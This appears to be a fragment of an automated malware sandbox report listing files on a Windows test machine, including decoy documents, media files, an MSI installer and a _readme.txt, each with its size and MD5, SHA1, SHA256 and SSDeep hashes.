C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\eyP8XnrLY rQ9ZYZ.gif 84.64 KB MD5: a2c80b3613b0c89d6e90bee5f6993779
SHA1: 8ebd6943a5d2f57689b915707cb8da507bb0e604
SHA256: dc43de4bc4d57f4fe1bc0546fefd60190bc3c94ca83473f840901ece56717f23
SSDeep: 1536:46HTyXBf/sjOz5sYkSb2RyUAHJmknKxiGcEAxNdzPN6Fr3tSMlbmTuv:46z2BHE2sYkSqRyUAHJmVxAJNdh6Z3QS
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\lfJNr8tOZ7oDHun6ukoV.gif 43.35 KB MD5: 1bbb003c5786fe9dfe855fad703c4c94
SHA1: fda3679e1e08a940d8e78201550270b7fc2bfc03
SHA256: 4a1b3e0ec3c42889b7d98342ee5d6af61bc46261e5ae62ae2cc5a85998d5a6da
SSDeep: 768:AC1dzaj9LLvHk1VGIFm5acISVFvEZ0KSLtp0o7iuth9X/tRBeoeO4fns7Mzc:AC1duj9LLv6GoO1Imi0BtyoWazVneJs9
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\VFWyDHM.png 60.96 KB MD5: f88db3d6f26d7355cd038d245c10cab4
SHA1: 5751b5c5d13dab47ad5a71c86cd7a71f272fe213
SHA256: aebff11de1c88a9aa8c6f4623b4b606e0b0fba2f8c7472892b9f9ea9c214296a
SSDeep: 1536:Rz6Hcdw3ZKw+0P6PITOG4eBLZmB4cGuW7rfjFhzDEl:R2HcwpKw+0SwTODeBqTIr7El
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\a9qF7OuHrZ4T.flv 15.57 KB MD5: c296eb305fd7db0e587eae8be2be2377
SHA1: 7d4af68dc3dbd5da82e67abf409376c8be833e02
SHA256: 2956ad2eb1c54ff93678471e88a44babaf3319626b881a0f30c218809699481b
SSDeep: 384:1GUqNbxxX7xlnHPYaPe7IXJchQtdyE1oc2QJsR5XQFtx9k:wUc1xlPe7IChQfyE6c2QJsRuc
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\KEz1B VUjzGhZ.swf 77.47 KB MD5: 27421e592442f4a8d526a2a764620b1a
SHA1: c8e4f3aa54767385dd1428186afec88f88b32222
SHA256: ea1cb5ac8385043c34042b7078e6c91c0f1b1c1c0c16c2b570a1f120cfc8151d
SSDeep: 1536:LuTgdSAk3xIyNhSTaIhb7qmQ/8dkjMBWYjSkcOthj2k1rpYaIFiYp3B7eIvo83MS:LucdSAdyLiiTj/YWkcnk1rpYaIFic3Bb
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\RrLl7FRJlURSY01.flv 35.06 KB MD5: c4eecd5cc661d79c3cc4c6885b6c3114
SHA1: 4f95cfb746b2d56eb854531c69476df133e3eec5
SHA256: 93bba8111a04097edf780fdae9de97ca4cf138334e2cf9020a89b0062b8b3be8
SSDeep: 768:wH7leNtM75AxctuuotF8xrJ2v05x4so3WrI/1xwVh4:wbUN4Ajyvx4srr4qS
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5ETH-YOt.pps 84.58 KB MD5: 5c6fddf1f3617e462de165d564daafa8
SHA1: abf636895598f904561e4d8437a1ec547e3a7c76
SHA256: 3c76886fee17e07bdd68697019d26297294063f5e50d04b2ab81e1d0c555d5d6
SSDeep: 1536:skJLn8eBnvAbot5VzzRubFfKAyquWYvsskzXnNY4xj1gAwnYRRHZfBPMQ:skJLpBnvMweFyAyOGsL7nNXxpmoZfBUQ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5LxZSjV.pdf 3.25 KB MD5: a0403b697a45aaa908cbe14b34cc359e
SHA1: 87a7d8de5fd77316e8035236a8bad845bc807a8b
SHA256: d1c90834941ea3cca06fdfcff1c23e81011298e7407274bb149e03a014271b24
SSDeep: 96:fVDVRB1jyD/30t6/LtJKBFluAAd2mhjLwCuU7PSiDYJaR:VPyDP0t6eihjLlSHaR
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\8GBnXsZ.pdf 3.37 KB MD5: d730f22a63ab5096eaceb00eaab221f7
SHA1: 9ebbe64ca8b3b76f01f11df25ab181e20089a482
SHA256: 13083e6849870ddc2e94a30be4e2255294a0f931caed8efa6ae16c685b35506a
SSDeep: 96:fVVGvigHErNKQ18asb+AqIWTry4oCq/XgDOjJEhsW:jG5HKNV18afAFKW4E/XwKWX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\aVltm_fp_1spcSpiUB7E.pptx 80.37 KB MD5: cfd0b59f43d37d03a668735920b78777
SHA1: 8d6a6ff3fe195329558046d043ff729dfe862f47
SHA256: 23ae7927173eec746e11a70b2732c6f53275f7aa979321690c2cdb8dfb96d2b1
SSDeep: 1536:iHslAEAHzkOCGA/Z7JwOjfe3DdLVcq+PfboXIMxBOGfuRK5/UBW9vvu38Fi3/hLl:osltAHy/e1p0b/uxUBW1vu3VhE/Xj07J
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\dthjAR.odt 83.67 KB MD5: afe4072d58f32287e47340609e8e1c0b
SHA1: 539a7f867ec28aec1bc13687f149954f7c97a6c6
SHA256: a2658a660ed3d08a8f046099b069def8d5cf96e3e6ccd01f7ffe2dcd7339cf02
SSDeep: 1536:SGgaJK7wVEkyW1eCGc8NKbcKZSvfyXrCyG8Z3pqf+cfszLhYASAlSujiQl:ScsCakQKZSX2qqcWWCh5SAllD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\HOw3I9OnurIF0.pptx 54.54 KB MD5: fe10c05b0c9889f069208b428e9a8f46
SHA1: 7bee041e4f1dce999c4a38d862ac3b06add8070d
SHA256: c5272474c55178c0a1d8c0262651b05ef8465f51baeb3d1e542752ef828f5969
SSDeep: 1536:VtgVx5AG0NHQ+mT0WSzB64wMbNIOQTn1oIPbzcsG:VGVxP0940JzB64wMbyz7ng
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\kLhp.docx 78.43 KB MD5: 4c17eccfdf4eb49fda9e8f268db51201
SHA1: 30f06a1b6c56fe31cd0bb6f49c82c0e8eb0d6228
SHA256: acf28eed2a462af5f13ff689c3fde01abd478f2d2655058039f076bdc269d404
SSDeep: 1536:neW0fBalraXrAeSCS/ovea+nt/zB/JFoylz3rc+cqDTViNr3QpnFWrBkhrHDclQY:eW0Zalr6BChaQNJFZ5Y+cqXbpMwrHIlp
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\M85S8 e0deSz1O2lZp.xls 96.37 KB MD5: 9b3625eea8114e20733d0f0805336bee
SHA1: af79f0407a1cd3587ccdafd37208eda08e157fbd
SHA256: 8e274cf29e02c9bd5721838b95f64c2c8a84cd8f949b87fb8805772b6230fa71
SSDeep: 1536:Z0WFTNdHiMQdR3ymLIsNuqoNRR69Kq1s2UfXN/jsgLerz7JPe7KZxlA10KWbXjd3:TrxYdZymLJNuHN7NG4fLcVDbJb+c
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\pbZLWA2gHx6B.ods 42.59 KB MD5: 80f339b9c96a15ba41cab21f383dc266
SHA1: 88ef9f07b5449260b17bdc875d85380d5f018fbb
SHA256: f08a845639c5d75c08fd4f143631aba20daea0c4d9c730fcf0e46540295b7733
SSDeep: 768:Ei5Y3KWKW8HapxBeYZW9nMnh/BsM3tpTXzWioCnU55z6yfZpjIthe0DB1nYKXETQ:Ep6gLeY4Gh/BsuHWilU2yZ9Ithn1nrUk
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\z ACbUu.csv 99.53 KB MD5: 99f12534ad991394df007583e678bca1
SHA1: 1b86fc71c8b87ea1b7ad9bde418d4916fd7270ed
SHA256: 37d6ad0739ab58d4a36b80871dc0bac53232974f290e855a33637cca41eebfd5
SSDeep: 3072:p2czrHQFu3w37ZbCUnPbo38TNX9AJ5yxV:p2wrHQFoC74UPFTNNAJAn
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\NSMy5XFpc9v55E4.png 16.98 KB MD5: fde2bc2061a8a2fbae5e9fda67033e8c
SHA1: 6e1a55efe6fc23f35b11a000c2622f0c25171365
SHA256: 691f615642f394ba0839eb22c2db4158af5e48b3dfcf4bd2bd61eab35172f125
SSDeep: 384:cezGtQtNwBrEu9mnGaaenCfzAxBW8uqlCp5jScxFIP7:tGt4+1HWC2wqlCp5jSfP7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\sMjYpjKhyZpf8TNaMG.gif 60.47 KB MD5: d103aaf38ee1e28abb1dd2d9bab77785
SHA1: f8d7aeeef0f7c861068a104ce504d0f1a461f790
SHA256: 0077be53bcc8df357ffac38c5e468564e3311b78ad5b7b1a2f45526522a26ac5
SSDeep: 1536:CqfXILmd9FDq4jwLPks5dFgLkgwbcCw6rWXUsf+9:CUXIQ9Fq4jSbFqkvYBu9
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\V6CUx4Z.png 46.98 KB MD5: 4cea05ee38e55a92f5b0914a74a29f09
SHA1: e50445a83f7862f6cf3baea3d53da98d4284c4ef
SHA256: 6194bf07f1d9b738e812f06434e6c463b3f70630a9974ca9a96dc39bd0c382ef
SSDeep: 768:N5e6yzTm7g5jzk6/flU+l1KK0SYJVD/RI3u6mHvp1MLgbpmpYV/QsLHZwWb8EKF1:NImQk6XYJp/Rv6mBGk0iV/FLHmgMFVX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\lZ73i.avi 81.53 KB MD5: ae14424c1dee421114e51a726d66fff0
SHA1: 445625cbbea107b0f81216ce6c33922d31950c37
SHA256: 425b10bf50b550e16f39aed2153a3c138e4fefda9aedbbb43893c5517c92b859
SSDeep: 1536:TCcyaBCG/IuPlWXePLoT2Y35+0J5A/CbhIDdTE8vYDjVFCkptikvSo:GUR/IIWRv+0LOkhIdTE8vY3Vtik5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\NDd8nvPiASazxx_Qnd.mp4 96.84 KB MD5: 323d91435a5e0c7ec5ef6b982302da2f
SHA1: 7fde41ff1a3f6bbb5b334f4db231f72749422773
SHA256: 16a1c0b1939b85d54680e6bc7bc05d9023540b2814f953e76d4ebf084ae48b94
SSDeep: 3072:oqnGHfi42thowIppUsCtuuNIK/LJNrOTglbjFga6u:o7qZ/owITUsCtfIALPrbRia6u
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\QV66E7hBIev3ByZZaaQi.flv 1.20 KB MD5: 6139f25857aee763e4a6930bfc56f0bb
SHA1: bd012c5848efadc54616db8d9173d673888c7e1b
SHA256: 4fdd1bf85b56b56a10737d9487608c5c09afb62b902b886b4b6722f45ab2f6c2
SSDeep: 24:8f85Z+mchRiCu97ay2igZ7zoAXHg6Qto8ruUJ//bdg2BWUFbD:Dum03u9O9i6fw5uUBDdg2rVD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\T0lSyaUX_nTdUnU89-7l.avi 34.45 KB MD5: 24b55abdcd3a4fb7c1be6d78f6cfa3b2
SHA1: c17b12d207a0c0655fb1386461428311def898b6
SHA256: e3b1a250ee2e61ac606eb0f39706ed39a6f814419631e4c056f539395805b877
SSDeep: 768:w72vYUW7rAYb9mJxWAbGZPHt6eYh01ScOLrIASy:lYUW7rAE9vAbGZl1Ym1WLrIASy
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\M9S6OcF7aYbMU.swf 23.42 KB MD5: 1a80d06ee059f2a4396a60b5c1473d23
SHA1: a29eecac96039902ee8fff261be8285bd7115c81
SHA256: 9efe574f36b224e5ad84a18523f90c217c96c325c808d1254b480ac854b0d094
SSDeep: 384:40R3sPTHnjQcDPmmD5FxMC4ktT/nqDJmhywBs/YeE0XoVRt03bj:M7DTDPfpMDuvcmhyWs/tEMoVA3bj
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\MKQEfW1 O9_GGct.avi 53.83 KB MD5: 667c914aed82cd97428d798c16d8d119
SHA1: 3ec304b3ebe26e82fbbfc42b88731feb43f4897f
SHA256: b087b64d01612238442fa1e0a5dc21a9e29836311868a1d563043f5d8ee62dfd
SSDeep: 1536:IthMcCHw9n+J96Os1n4QL+SP0x7cN4usrVcGpprgy:7w9n+DTSsx7cujB/0y
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\xSTCc.avi 38.73 KB MD5: 2b86330229c3369abaa1a0f94a3aba3a
SHA1: b1e3272ce7b649fbefdab0c6666568b769fcf744
SHA256: 4232aef697744fc6ef0ad913436e8e9c3c34612e96e8466941a4389335016d0a
SSDeep: 768:CbYm4eYOM/YvCazEB1BE+j/UilDMvB9qrFVT9f8PTEiRk1:Ed4eySEBEWA9qrFVT98Trm1
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi 181.08 KB MD5: 19a1c7dddad67c09a6d11fdcd2f279e8
SHA1: b01474444b9f0bbef9831d40617f508d3653944b
SHA256: 3b99eaa45ae6b7471361ee350ac06dc9c18e068f25922dd649ccf6ab1578e675
SSDeep: 3072:kD3Ir3nLAsHEC7XU+0AxdiuUHd4IxjZioeWqXqGP:kO3nQs7/iuUHdtxPzqX3P
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\E31COVq.mkv 66.20 KB MD5: bd76acb4c4508d22d90bca9afdb1167d
SHA1: e4a1c44bc02732db38fb571cc8fe00cf4b1e082e
SHA256: 044cd24295f2f043d52ccc013d62cd8d65a9a410cf2fbc552ea0dd821962d064
SSDeep: 1536:4pkP8QWayDDBi+aEL5YW39WBWnowHes9XNvGyR7r4aR9OYvDOziZ/C:mkPZmHBraEL5YW39tnowHesZ59OY7OWg
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\utbmN6bsL1s2QoyIy_N.mp4 38.64 KB MD5: 95a2eb07b05051b1c97f0c66aab913fe
SHA1: fc2dcf51f0b54de8d1b820957b2f22fd0ce7b418
SHA256: 59e47c6b67f90e0749d2db282948968fa38c524d339dd5523508c9fdee9ac4d3
SSDeep: 768:+XSrGrWX9w4UJeY+MnsZOXhL+j3XmDJfWeQtPu7dltCGB9:3rGrW7U0d32DQztW7dltCI
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\bjmnfbrNfGEXCMraZ.flv 55.08 KB MD5: 7ea2d90c438cd16a4272d3f8971a8294
SHA1: b3f415b0cb6d57595633f0ce7d10511c28623805
SHA256: 3181bcbd0f3451afff0e3728a377ba65f44e7edfd99e33e19101f82adceb503f
SSDeep: 1536:QI84kwxc6o5ws0TQQsrURGlan8LMly0BrJZJ:QIguses0TWrU8angM00BDJ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\Djmg5Xg.flv 14.05 KB MD5: 7b4f70d472fe1773cc9ebbd68fa7b920
SHA1: 2b413d764779a6b9ffced45e4edc755c3a51dcd1
SHA256: 4b71dd54e441f302418fe30ac8714f2bf536920a3711e07faee5cfd36791d5d8
SSDeep: 384:O9IIDz0UXO40rzzjLJsT0JS4BVpYpeYQ2SxqFAN1fK:AZcTJDI6QFAN1fK
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\pW-HWPux0H.flv 26.67 KB MD5: 6d35e444112fc476ceaddb26db9ce62b
SHA1: 195a07648886a771ee421b601e248b5eb3a837fc
SHA256: 45ce6fa4dcbcfa94303215b3a61d426e150ab70b248dc9b5858415815f050bdf
SSDeep: 384:5y4IfTmY5em2ap0BN4hGuu3rN6mq4ha2JuWtFyEMFzXIph3jZ6VQN:w4CT5emgN4gjrN6mm0kE8crZ62N
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\UMlO p8XR.mp4 62.88 KB MD5: 0dac0c8927bc8b34b32900295b3462a0
SHA1: 84c5bcee2d2f96606160a4a5752fc4df81147ea1
SHA256: 0ac4717b95599a818c47c352591f7bd90e8fb4a5bc07e7a78d09961fbd61c47a
SSDeep: 1536:/Dqjf+dmYPREAgMNEu2xZYOOjH+ZNGAnX7Re:/DkMmH1PxZJZNGGXE
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml 91 bytes MD5: 444000394facc34bbaa1a5ac11a3fcea
SHA1: ea4583d8355bf44fbb8cd2743b75020dc149e5e5
SHA256: c78e87667b24f89aad054189658d2c7db55622652bc1220c98d40230ea62873d
SSDeep: 3:D68PifPDNWRUqAksncIFiRHIgHaRT:enHBWUFcii96Z
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml 914 bytes MD5: 48097f2721fc572c525792c44b0ac368
SHA1: 4b1e1e4ba61ddfb06274b542252e48232fe195e7
SHA256: 8f8fa2abb3cff86dbdb142ebfe7c9f8bd9ad2753ff435e47abb71a45e03e50cd
SSDeep: 24:y8XbEcmtT0AeAu1Q8FkFvQ9VNGntDEvorgjNI2coyEWUpVBBWUFbD:LEcgo9Au28FPotgvw+RcbaVBrVD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\I0IPALQTs_bmOEuFUuOl.avi 40.95 KB MD5: 61fc58d224e8ffac42e3c5fd7bbc824b
SHA1: b752d8e2f63de0ed1b09e525a3c7685f9b9d054a
SHA256: cbeb8c19aa43f3c8e890eac1f0e942de63f6e06c4af6bce8433468c199f6c356
SSDeep: 768:9MfUklxpREfaJFwkxmVWnbZNiRSaDtTfXCL3v37wuDahWNOmlY2jA99xm:OPvEfa7wBV/RSapf0fPDROmW9xm
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\Imq8H_txUYezfovf910P.avi 13.32 KB MD5: 96788c23532863dbdd9230455f93a36e
SHA1: dc6b06889c95fc2e1fcc4ad7119ffd46b34563b8
SHA256: f97fbaeda2d1b8f1408ebcf415e97c677a1118ba81a1e7076a9cabcc67a72d84
SSDeep: 384:jihlhMLUMFcDAzvS/IdJxMixpqzonofv1JVr:j8lhMLUgvSADLaUYv3Vr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\PSRUTQvyeJCY.mp4 87.09 KB MD5: 12bbf06134224a228cc43e5b1db52d6a
SHA1: e0d35bbbb1f1c6fb67dca1e2b12d921f5de3b620
SHA256: 4a605137db0f3504cfb9d5606d3888569a4547cb77def577a61cc2fe41c220fd
SSDeep: 1536:DeVNy3ODnsb2kWZEqSbeojuDrfG+//ohYiZaiWnGwo4Ivy+83QQH9M/rL9:DeKODnsbTEsiojuDD7/wC0av9oZvy7PW
False
C:\Users\5p5NrGJn0jS HALPmcxz\_readme.txt 1.15 KB MD5: bc01b36baa05c91b7a3ed2103e216ee9
SHA1: c16d60da0d1747385b1eb8e2a7a2459fac2d011a
SHA256: 7c35e933e4e3cf44a7d9369f93af191425b6cf941bf27d4c6f812e656f51344d
SSDeep: 24:FSimHPnIekFQjhRe9bgnYLuWG95GmFRqrl3W4kA+GT/kF5M2/kDwyD5oELDrBWUZ:NmHfv0p6WG95GPFWrDGT0f/k55DrrZ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact 1.23 KB MD5: a4f2240312dffe64969d33bab9911ade
SHA1: d22cd2c755527ffb06b5d6c7d53b9aa7616d497c
SHA256: e50f2f8cc674851b3762c16029a1405d565947b99eeebee1166e1377fbe0f22b
SSDeep: 24:o05c4cK4FXOKOpTxZK5FH5M2UajIXEEO2ZUtwfFz3fVqMg57DbQ/BWUFbD:o05c4yFXOpLK5PMziIUEO2ZUOlshdDbM
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact 1.22 KB MD5: 638e00c8b5989e0fe39659f4b39d740f
SHA1: 209231a38b2599b05e637c6622c1dbc6d661a1e9
SHA256: 84cf0e4d40b23cce1e6159e8e8023df48443cf73152c441aeb76852d7a824aa7
SSDeep: 24:o05c4cK4FXOKOpTxZKGM6kFUajIYlW2H7EeLd8dC9L0isjA3neBycABWUFbD:o05c4yFXOpLKtuiIYA2H4c/9L0i53eyH
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\dSfwXCkwSPKl-.avi 63.53 KB MD5: 8ce2554eae66b3d8c0aaa48518a48538
SHA1: 54e961b248228cadfe217469553de077cbc41e8e
SHA256: c858c42bde1c020234d4f9bb9615ca71ac7e7ded312b1903be7450c8ea87ae39
SSDeep: 1536:eZQghe0n1xYL0jbiKLUW4xgEC8o8eKAgmHf2lBbV1s2VYKV:eZ5hx1u2iKz4Q8o89AHfsD1soV
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\frVUZwt9PcEpwFw.jpg 79.22 KB MD5: afad99c97e39a62f36ae9aa4952f3633
SHA1: 17f7e5122cfd8a5446acab1f3b4f4eef69d9132e
SHA256: 3592f2f609d022689b7de48b9a814cbfe6683731d035a568f05574730d73f37d
SSDeep: 1536:oZA/Nxy9kzYosyYh5s5X/GYRLp9NbuZLXNqnvUBuPi:oW/Nxy9OppYsNNPbuZpy8kPi
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Gp40F.mp3 51.10 KB MD5: 31cf6ce5b4d0c5d5c40a7fc1f6a30219
SHA1: f8e7058e687a58b1dee7dec320e6fb7de79e0d20
SHA256: 406cad1ac8f1d5b6dcc2e56254bf80513ec28732b5df5dbc1c7613a4f2a113e9
SSDeep: 768:wCxYhmXGTNL4xeavYFMzz1tFvjWq9JU7neCNza7qOz6IIgSCciiql4uWsr+wCda5:w9hdTNDavYWzEy69Nz6uIIbreJFCAXr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\IcgE7 x.mp3 43.15 KB MD5: f902ab0896d787e05820ae05dbdfcb56
SHA1: cb09a7fa52c4b211a10449c2d3226eee0d0a4213
SHA256: 95765a5a77c7d8555b607f0fc9b8bcd0accf8dd92d54bc5317db196d213b04e8
SSDeep: 768:NkH0/CLAm/yDMUEdl+jkp6/fsZRS1r2DkwIDnYWDSLhPh74ccVkzBp5I8dJYakJ:T81rPdKZ/0Zc14MDnYWIhPh7NKArRJYH
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\K0eRKbFqwJi63h.flv 81.85 KB MD5: 5ac27eb584aff7fe3db500bb528ca020
SHA1: 435a277809fe444481d9455916537096fd7e120c
SHA256: be992c55f474086d876b22769add5358e09a1f498624971c9cc1b81595c09904
SSDeep: 1536:qojFjUbBnV4xoX5W6ZDt+LbFajOklcnfD78YVkiBHruYpIKkQCF3npUcIpZ:qYjSBJ5W6D8vsjIfvoiBLuEi6cIH
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\vDgHCp4Eu83i9SpY9-10.m4a 67.50 KB MD5: f03f35c98194f1ecb9591fc93173b996
SHA1: 15fcd573cfc3638aa14c18fa88fa36b759a5bcca
SHA256: 55790fb0323c283ea44c94d1d8a2c72b14c8ae7105206268b6038f2646d08798
SSDeep: 1536:U6SxGaUXPOSK8erqBgw5cxIDBggQYC/hLDRnhum8WYMacJrgX71KKJ:SED/ePw8IDByYC/hLTuN7cJMX7tJ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Q Yden1pX.xls 88.31 KB MD5: 98f23245af09f84a41a90c964b8fef9d
SHA1: 099db1f27fb89a06dcd909ae47fb7fadb86b0557
SHA256: f43b8728f0d57a5d78fef3967305cce728e985dee4d1ef3dce0af55b52cda79f
SSDeep: 1536:qdCoZcGpZClZE35BRBiHXOh676VGbpXXy9mdPmdtdiBw8QN1pih0MkM4O6TEjjhi:ifZcGDClm35BRc3Oh6ZnYcmIK86pttVd
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\8OcrQfqf9.xlsx 39.59 KB MD5: f9317fcb24ce9203b96b1d9c9156f7a9
SHA1: a3dd5bc48b47ad74024bcd1762b22ea4e0f1ba06
SHA256: e887613fbacfbd770c5f08d25b9ff063ef8e2f71c5d02dbb8db64e96db5496ce
SSDeep: 768:AfKVwb0lkMBUhD0+RJpKLcE744j8lsXCajgB6/H8pGmiLDg7NAWIysfN:AiWGBUhQ+JqfzgiXv8ScpGTDjWIJN
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\jLUC 3.docx 93.59 KB MD5: 50c5cf41eb883d1f1de922b1a17e45a8
SHA1: 443378e45da67e003d5813e9152aad21b88c3e4e
SHA256: 036ad5c817ab8207c429118387dcf2a0a7c3c991129fd7a30ad9607d1f7f4b5b
SSDeep: 1536:VsPX70+4qBfLFxtYjklJN57/Qp+OF6EHDwwGAvGqch5EfjIu5+ik4:Vsf70+lfLFvYj0HSpbVwXr5Tu5+p4
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mMGsDdpRxCcIwjb.pptx 60.73 KB MD5: bbaff1270738b877a1da94cd0b22ad30
SHA1: 17389f6c269f14ff0b6ac0e75681b667bd42d31d
SHA256: ec2807dab81ced4c76f9514c7dc34336ed8350fbe36bc2241cb6f025dbd6582c
SSDeep: 1536:uzvF2ts8ZtgjU9+rlj3HTkOTXWpLx/b8I5u066:uz+s8zZsnkOzILxT8su0r
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mXYQzNZWY3_pbSh7dVoS.xlsx 13.88 KB MD5: 6984761224351b25386b89ce23ac12f3
SHA1: f59810503b0f78d1e95095aa19ca10bd80ea3dd5
SHA256: 30f25b17b125e7974560406454d7810ac465108131cc733514c0a3c64bd81fb2
SSDeep: 384:HZTu5/WafBnmSwfOLuJZMqNrlAKc1k/T7E:HZTu5e0KOUuqNrqTk/vE
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rOeN9J2zJO_02nt1ly.docx 53.57 KB MD5: bf8ebbd080872049da770f1d4b79a50a
SHA1: c704b8ed9cc91851665ad314151dba2d89ffd42b
SHA256: cf83281cbb48ff35e468edb28ebe4221c8c7e60dbcc95236d40de5fbf18cbf93
SSDeep: 1536:IX1fuhytQ8gRxjmTzUpYgXQFm+oVoFzY1UP:61fuh9vf6F5eAYeP
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tJLm4JiczASJ_8Z0U3i.ots 95.11 KB MD5: da0c92ebd7427870da8fa2d0092a1420
SHA1: e7453e38d4584936ef8efb9398dae1117ebb2f5c
SHA256: 7b29962371296423dd69eb5cb6df9639cbab23ec31cbe8e4d2816a6a1ef208a2
SSDeep: 1536:VG2vwEhjpxmPcxQQInyoqkwvrJQaxkHq/Q+KUU0Gt6fYLLDJOMZPQ5gqEiW1D1Ng:Y2vwIjpIn9qJzJQaiHXeYeY7HZP2XW1M
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VJH-kfHp7SFpre94.pptx 24.62 KB MD5: 7bc740bc67e016636035c3be69d86e72
SHA1: dfeae244d43e6a69dec393b54169dcd9837f99e5
SHA256: db17dc75f3701612fb5cb6d126c7100a8bd56212c91612282298ed0cc2b66199
SSDeep: 768:He2fqBACB8wXf3a6ubYBAPoQx+mcjEPci:+sW/Xfq7bVPvcoB
False
